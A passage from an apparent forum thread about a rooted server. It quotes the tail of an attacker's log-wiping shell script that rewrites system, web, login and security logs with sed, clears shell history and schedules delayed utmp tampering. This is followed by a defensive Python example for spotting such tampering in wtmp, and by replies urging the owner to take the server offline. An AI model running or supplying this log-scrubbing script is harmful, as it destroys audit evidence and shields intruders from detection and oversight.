        sed "s/$word/$fake/g" /var/log/messages > /var/log/messages.new
        mv /var/log/messages.new /var/log/messages
    fi
    http="yes"
    if [ ! -f /var/log/httpd/access_log ]; then
        echo " i can't find access_log "
        http="no"
    fi
    if [ "$http" = "yes" ]; then
        echo " Editing access_log"
        sed "s/$word/$fake/g" /var/log/httpd/access_log > /var/log/httpd/access_log.new
        mv /var/log/httpd/access_log.new /var/log/httpd/access_log
    fi
    httpd="yes"
    if [ ! -f /var/log/httpd/error_log ]; then
        echo " i can't find error_log "
        httpd="no"
    fi
    if [ "$httpd" = "yes" ]; then
        echo " Editing error_log "
        sed "s/$word/$fake/g" /var/log/httpd/error_log > /var/log/httpd/error_log.new
        mv /var/log/httpd/error_log.new /var/log/httpd/error_log
    fi
    wtmp="yes"
    if [ ! -f /var/log/wtmp ]; then
        echo " i can't find wtmp "
        wtmp="no"
    fi
    if [ "$wtmp" = "yes" ]; then
        echo " Editing wtmp "
        sed "s/$word/$fake/g" /var/log/wtmp > /var/log/wtmp.new
        mv /var/log/wtmp.new /var/log/wtmp
    fi
    secure="yes"
    if [ ! -f /var/log/secure ]; then
        echo " i can't find secure "
        secure="no"
    fi
    if [ "$secure" = "yes" ]; then
        echo " Editing secure "
        sed "s/$word/$fake/g" /var/log/secure > /var/log/secure.new
        mv /var/log/secure.new /var/log/secure
    fi
    xferlog="yes"
    if [ ! -f /var/log/xferlog ]; then
        echo " i can't find xferlog "
        xferlog="no"
    fi
    if [ "$xferlog" = "yes" ]; then
        echo " Editing xferlog "
        sed "s/$word/$fake/g" /var/log/xferlog > /var/log/xferlog.new
        mv /var/log/xferlog.new /var/log/xferlog
    fi
    utmp="yes"
    if [ ! -f /var/run/utmp ]; then
        echo " i can't find utmp "
        utmp="no"
    fi
    if [ "$utmp" = "yes" ]; then
        echo " Editing utmp "
        sed "s/$word/$fake/g" /var/run/utmp > /var/run/utmp.new
        mv /var/run/utmp.new /var/run/utmp
    fi
    echo -n " if y0 want to delete the last commands type (yes) if y0 don't type (no) 0r anything "
    read command
    # Both branches queue a delayed utmp rewrite through at(1) so the current session is
    # scrubbed after the operator has logged out; "yes" additionally wipes the shell history.
    if [ "$command" = "yes" ]; then
        echo "##Now the last commands y0 put it will go to hell ^_^ ##"
        echo -n > ~/.bash_history
        history -c
        echo -n " y0 have one minute to exit from server..go0d luck "
        /etc/init.d/atd start
        echo "sed 's/$word/$fake/g' /var/run/utmp > /var/run/utmp.new" | at now + 1 minute
        echo "mv /var/run/utmp.new /var/run/utmp" | at now + 2 minute
        echo " zxc-Antilog Ended work... Cheers ! "
        exit 0
    else
        echo -n " y0 have one minute to exit from server..go0d luck "
        /etc/init.d/atd start
        echo "sed 's/$word/$fake/g' /var/run/utmp > /var/run/utmp.new" | at now + 1 minute
        echo "mv /var/run/utmp.new /var/run/utmp" | at now + 2 minute
        echo " zxc-Antilog Ended work... Cheers ! "
        exit 0
    fi
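Added example, not from the thread. The script above does all of its cleaning with `sed "s/$word/$fake/g"`, including on lastlog, wtmp and utmp, which are not text files but arrays of fixed-size binary records (glibc's `struct utmp`, 384 bytes on x86 Linux). Substituting an address for one of a different length shifts every later record, so the file length stops being a multiple of 384 and `last` starts printing garbage; a fake address of exactly the same length leaves the file parseable and is invisible to that check. The Python below packs a small wtmp from the sessions `last` showed earlier in the thread, applies the same substitution the script performs, and shows both outcomes. Record pids and timestamps are constructed; the struct layout is glibc's.

```python
import struct

# glibc struct utmp on x86 Linux (same 384-byte layout on 32- and 64-bit), little-endian:
# ut_type, pad, ut_pid, ut_line, ut_id, ut_user, ut_host, ut_exit, ut_session, ut_tv, ut_addr_v6, unused
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20s"
UTMP_SIZE = struct.calcsize(UTMP_FMT)          # 384
BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 2, 7, 8

# 2007-07-19 14:14 UTC, the cristi login `last` shows above (epoch computed, not captured).
T0 = 1184854440


def pack_record(ut_type, pid, line, user, host, tv_sec):
    """One wtmp record as login(1)/sshd would write it (constructed test data)."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(), host.encode(),
                       0, 0, 0, tv_sec, 0, 0, 0, 0, 0, b"")


def parse_wtmp(data):
    """Parse records; raise ValueError when the length is not a whole number of records or a
    record carries an impossible ut_type, the two cheapest signs of a text-tool rewrite."""
    if len(data) % UTMP_SIZE:
        raise ValueError(f"length {len(data)} is not a multiple of {UTMP_SIZE}: records misaligned")
    records = []
    for off in range(0, len(data), UTMP_SIZE):
        f = struct.unpack(UTMP_FMT, data[off:off + UTMP_SIZE])
        if not 0 <= f[0] <= 9:
            raise ValueError(f"record at offset {off}: ut_type {f[0]} out of range")
        records.append({"type": f[0], "pid": f[1], "line": f[2].rstrip(b"\0").decode(),
                        "user": f[4].rstrip(b"\0").decode(), "host": f[5].rstrip(b"\0").decode(),
                        "time": f[9]})
    return records


def sed_like_replace(data, old_ip, fake_ip):
    """What `sed "s/$old/$fake/g" wtmp > wtmp.new` amounts to on a binary file: a byte
    substitution that pays no attention to record boundaries."""
    return data.replace(old_ip.encode(), fake_ip.encode())


def audit_wtmp(data):
    """(ok, message, records). A length-changing substitution breaks alignment; a fake address
    of identical length does not, which is why an off-host syslog copy is the real check."""
    try:
        records = parse_wtmp(data)
    except ValueError as err:
        return False, str(err), []
    return True, f"{len(records)} records parsed", records


# Constructed wtmp with the kind of sessions the thread's `last` output shows (not a captured file).
SAMPLE_WTMP = b"".join([
    pack_record(BOOT_TIME, 0, "~", "reboot", "2.6.9-55.0.2.ELsmp", T0 - 10 * 86400),
    pack_record(USER_PROCESS, 3877, "pts/0", "cristi", "86.55.185.229", T0),
    pack_record(USER_PROCESS, 4021, "pts/1", "root", "a80-126-105-31.adsl.xs4all.nl", T0 + 7200),
    pack_record(DEAD_PROCESS, 3877, "pts/0", "", "", T0 + 3600),
])

if __name__ == "__main__":
    print(audit_wtmp(SAMPLE_WTMP)[1])
    print(audit_wtmp(sed_like_replace(SAMPLE_WTMP, "86.55.185.229", "1.2.3.4"))[1])
    print(audit_wtmp(sed_like_replace(SAMPLE_WTMP, "86.55.185.229", "10.11.123.134"))[1])
```

Since the script also rewrites /var/log/secure and /var/log/messages on the host, the copy that matters is the one on a remote syslog server; on the box itself, a wtmp whose size is not a multiple of 384, or whose records no longer line up with the sshd entries in secure, is the cheap sign that a tool like this has been run.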
     
  19. nyjimbo (Well-Known Member, New York)
    Your system was rooted yesterday, isn't that right? Expect to find more and more stuff until you restore the machine and block out whatever is letting them in.
     
  20. dgbaker (Well-Known Member, PartnerNOC, Toronto, Ontario Canada)
    You need to get that server off the network and the internet. The longer it is up, the more damage is done. Not to mention that, because your server has been compromised, you are putting others at risk of an attack from your server.

    Take it offline, and start rebuilding and closing the holes.
     